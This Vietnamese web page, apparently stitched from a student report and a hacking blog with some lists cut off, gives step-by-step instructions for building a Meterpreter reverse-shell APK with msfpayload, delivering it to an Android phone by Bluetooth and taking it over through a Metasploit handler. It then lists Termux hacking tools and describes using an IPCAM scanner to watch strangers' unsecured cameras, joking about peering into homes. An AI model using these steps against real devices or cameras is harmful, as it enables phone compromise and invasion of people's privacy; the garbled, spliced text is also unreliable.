Mod ứng dụng android trên kali linux
3. Hack Android trên mạng LAN3.2. Tạo APK có chứa mã độc bằng KaLi LinuxTrước khi tiến hành ta nên thiết lập phần Network như sau: Show
Vào VM => Settings... ở thanh lựa chọn của VMware. Tiếp theo, chọn Netword Adapter Bridged. Và lưu lại. Hình 6.9. Setting VMware. SVTT: Võ Đình Thông Page 46 Như vậy đã hoàn thành sơ bộ về cài đặt mạng cho máy ảo. Ta tiến hành tạo file APK chưa mã độc để đưa vào máy điện thoại Android. Đầu tiên, ta vào máy ảo có cài sẵn Metasploit để lấy địa chỉ IP của máy ảo này. Ở đây, máy mình cài là máy WinXP, nên vào CMD, gõ lệnh ipconfig. Ta thấy địa chỉ IP ở đây là 192.168.0.120 Hình 6.11. Lấy địa chỉ IP của máy cài Metasploit. Tiếp theo, tại Terminal của KaLi Linux, gõ lệnh: Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.120 lport=4444 R> /root/Desktop/Hack.app SVTT: Võ Đình Thông Page 47 Với IP là địa chỉ IP của máy ảo cài Metasploit. Với lệnh trên, thì ta cần quan tâm 2 thông số lhost và lport. Sau khi lệnh này kết thúc, ta được file Hack.apk tại màn hình Desktop. Như vậy, ta đã tạo ra file cài đặt cho Android chứa mã độc. Nhiệm vụ tiếp theo, là đưa mã độc này vào trong máy điện thoại có hệ điều hành Android. Nên nhớ, chỉ có thể hack được điện thoại có chung mạng LAN. Ta tiến hành gửi file HACK.APK này vào điện thoại. Có nhiều cách, thì ở đây mình sẽ gửi Bluetooth. Hình 6.13. Đưa file Hack.apk vào điện thoại Android. Cộng việc tiếp theo của ta, là sẽ tạo một Handler xử lý dữ liệu truyền về, từ máy Android bị nhiễm mã độc. Ta vào Máy ảo đã cài Metasploit. Khởi động Metasploit console bằng cách vào Stast > All Programs > Metasploit > MetasploitConsole. Và gõ lệnh sau use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.0.120 – nhập địa chỉ IP giống với địa chỉ IP của máy ảo chứa Metasploit. set port 4444– nhập port giống với port mà ta đã set khi tạo file Hack.apk. SVTT: Võ Đình Thông Page 48 Hình 6.14. Tạo Handler xử lý thông tin. Sau khi kết thúc câu lệnh. Ta có thể coi lại cách setup bằng cách gõ lệnh Show options. Nếu không có gì sai xót, thì ta kết thúc bằng lệnh RUN. Hình 6.15. Run Handler. Như vậy ta đã tạo thành công Handler để xử lý thông tin tại địa chỉ: 192.168.0.120:4444. Công việc bây giờ là vào máy Android đã được cài đặt mã SVTT: Võ Đình Thông Page 49 Nếu xuất hiện như hình dưới đây, thì ta đã hoàn thành, cài đặt, và hack máy Android trên mạng LAN. Kiểm tra thông tin máy đã bị hack bằng lệnh Sysinfo. Hình 6.16. Hack thành công điện thoại Android trên mạng LAN. Ta đã tạo được kết nối tới máy điện thoại Android có địa chỉ IP: 192.168.0.117:42701 vào lúc 2014-08-09 10:09:35 +7000. Thông tin của điện thoại, với hệ điều hành: Linux 3.4.10 – gf33c859. Thì ta thấy ở đây, địa chỉ IP của máy ảo và điện thoại Android chính là 2 địa chỉ cùng thuộc một mạng LAN 192.168.0. Phần tiếp theo, của công việc là “dạo chơi” trên điện thoại đã nhiễm mã độc bằng Metasploit. Mình sẽ trình bày chi tiết hơn ở
Chương tiếp theo: Hack điện thoại thông qua VPS. SVTT: Võ Đình Thông Page 50 XÂM NHẬP VÀO ANDROID THÔNG QUACHƯƠNG 7.INTERNET TỪ VPSTermux là ứng dụng trên Android giúp cài đặt tool Linux trên Github như Pentest Web, DDoS, bạn có tin không? Android là hệ điều hành thuộc nhân Linux, do đó bạn hoàn toàn có thể cài đặt các công cụ của Kali Linux lên điện thoại của mình. Hiện trên CHPlay có sẵn ứng dụng Termux là một công cụ có giao diện dòng lệnh. Termux tích hợp có đầy đủ các câu lệnh của Linux. Bạn có thể cài đặt các công cụ hack có giao diện dòng lệnh trên điện thoại Android của mình bằng Termux. Bài viết này sẽ hướng dẫn bạn cách cài đặt, sử dụng và giới thiệu các gói công cụ hacking bằng Termux để kiểm thử trên Android. Termux là gì?Termux là ứng dụng giả lập công cụ dòng lệnh trên Android có thể hoạt động trực tiếp mà không cần phải root hoặc cài đặt. Bạn có thể cài thêm các gói bổ sung có sẵn bằng trình quản lý gói APT. Kho ứng dụng APT Termux được lưu trữ bởi JFrog Bintray. Termux chỉ hoạt động trên Android 5.0 trở lên. Đặc điểm của ứng dụng này gồm:
Cách cài đặtĐể sử dụng các câu lệnh của Linux hoặc Kali Linux trên điện thoại Android bạn cần cài Termux. Ứng dụng này có sẵn trên CHPlay. Download Termux Các gói cần thiết nên cài đặt thêm: Một số lưu ý:
Sau khi cài đặt xong, bạn mở ứng dụng Termux lên và gõ các câu lệnh sau để cài các ứng dụng cơ bản: apt update && apt upgrade termux-setup-storage pkg install php pkg install git pkg install python2 pkg install curl Có thể dùng Termux để Hack không?Tất nhiên! Bạn có thể Hack với Termux đã cài trên điện thoại Termux có sẵn một số công cụ có thể giúp bạn hack như
Các công cụ như Danh sách các công cụ Hack được cài đặt sẵn trong Termux:
Lưu ý quan trọng: Bài viết này chỉ giới thiệu cách sử dụng Termux. Không khuyến kích sử dụng ứng dụng này để tấn công trái phép hệ thống không thuộc quyền sở hữu của bạn. Cảnh báo: Có rất nhiều bài viết “hướng dẫn hack Termux” trên Internet cung cấp phần mềm không chính thống được sử dụng làm công cụ hack. Hầu hết trong số họ chỉ là clickbait và không thực sự hoạt động. Một số trong số họ buộc người dùng cài đặt phần mềm độc hại điện thoại. Nếu cài phần mềm không rõ nguồn gốc sẽ gây ra tình trạng mất dữ liệu, hư hỏng hệ điều hành Android của bạn. Cách cài đặt các công cụ trên github để hack bằngTermuxTool-X là bộ công cụ gồm 264 Tool Hack các thể loại. Bạn có thể cài đặt Tool-X để đơn giản quá trình cài đặt các công cụ Hack cho Termux hoặc cài các ứng dụng mà AnonyViet giới thiệu bên dưới. Có 3 cách để cài đặt công cụ Hack trên Termux.
Cài NMAP – Công cụ quét IP, Port mạngNmap là một Công cụ quét port và thu thập thông tin về lỗi bảo mật mạng. Bạn có thể sử dụng nmap trong termux để quét các mục tiêu trên điện thoại di động của mình và bắt đầu cho các cuộc tấn công cơ bản. Cài đặt nmap trên termux bạn dùng lệnh:
Sẽ mất vài phút để cài đặt. Bạn có thể sử dụng nmap trên termux bằng cách nhập lệnh
Cài RED HAWK – Công cụ thu thập thông tinRed Hawk được sử dụng để Thu thập thông tin trang web như Tra cứu WHOIS, Tra cứu IP, xss, quét sqli, v.v. Vì RED_HAWK chạy trên PHP nên bạn cần cài đặt môi trường PHP trước. Sử dụng lệnh: pkg install php Termux sẽ sử dụng một số dung lượng trên thiết bị của bạn chỉ cần gõ y để tiếp tục. Bây giờ bạn cài đặt git. Đây là công cụ để tải trực tiếp các tập tin từ github hoặc bạn có thể tải xuống các tập lệnh, công cụ từ github hoặc các nguồn khác và sử dụng pkg install git Sau đó nhập lệnh trong termux git clone https://github.com/Tuhinshubhra/RED_HAWK.git
Cuối cùng gõ lệnh này trong Termux để sử dụng
Bây giờ bạn có thể sử dụng RED HAWK để quét thông tin Website. Cài Recondog – Quét lỗ hổng bảo mậtReconDog cũng là một công cụ quét thu thập thông tin và tìm lỗ hổng bảo mật của Server. Do Recondog được viết trên nền Python nên bạn phải cài Python trước. Dùng câu lệnh dưới đây: pkg install python2 Sau đó tải regcongdog xuống và cài đặt: git clone https://github.com/UltimateHackers/ReconDog.git cd ReconDog chmod +x * pip2 install -r requirements.txt Chạy Regcongdog bằng lệnh: python2 dog Bây giờ bạn sẽ có thể sử dụng ReconDog để quét lỗi bảo mật. Cài IPCAM Scanner – xem Camera an ninhIPCAM Scanner (IPACM) là danh sách cách Camera an ninh bị lộ thông tin. Bạn có thể truy cập trực tiếp để xem camera nhà người khác mà không cần Password. Để tải dữ liệu Camera bạn tiến hành các bước sau: pkg install python2
Trong danh sách sẽ hiển thị các Quốc gia bạn muốn xem camera. Chọn Quốc gia -> Số Trang, sau đó sẽ hiển thị các IP Camera bị lộ thông tin đăng nhập. Bạn chỉ cần truy cập vào IP là xem được Camera rồi. Mình thử chọn Japan (số 3) và xem được sân vườn nhà người ta, chưa thấy nhà tắm hay phòng ngủ hahaha.Ngoài ra các công cụ ở trên, bạn có thể cài SQLMap để hack SQL Injection, các công cụ DDOS bằng Python… |